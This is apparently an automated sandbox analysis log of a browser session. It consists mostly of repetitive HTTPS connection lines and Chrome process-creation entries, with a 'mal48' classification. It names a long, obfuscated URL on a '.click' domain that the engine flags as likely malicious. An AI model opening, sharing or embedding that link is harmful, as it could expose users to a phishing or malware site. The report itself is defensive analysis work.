Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 50347 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 50335 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 50282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50522 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50370 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 50313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50496 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50474 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 50369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50337
Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50339
Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50338
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50330
Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50335
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50334
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50347
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50349
Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50340
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50342
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50344
Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50343
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50346
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50345
Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50358
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50351
Source: unknownNetwork traffic detected: HTTP traffic on port 50317 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50353
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50354
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
Source: unknownNetwork traffic detected: HTTP traffic on port 50374 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50356
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50369
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50361
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50364
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50366
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50368
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50367
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50371
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50370
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 50478 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50530
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50304
Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50303
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50306
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50307
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50309
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50302
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50301
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50315
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50317
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50316
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50319
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50318
Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50311
Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50310
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50313
Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50312
Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50349 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50326
Source: unknownNetwork traffic detected: HTTP traffic on port 50503 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50325
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50328
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50327
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50329
Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50320
Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50322
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50321
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50324
Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50323
Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50327 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 50331 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50502 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50515 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:50250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:50383 version: TLS 1.2
Source: classification engineClassification label: mal48.win@29/364@367/100
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2260,i,10608258172845983546,5722045760868179073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2260,i,10608258172845983546,5722045760868179073,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
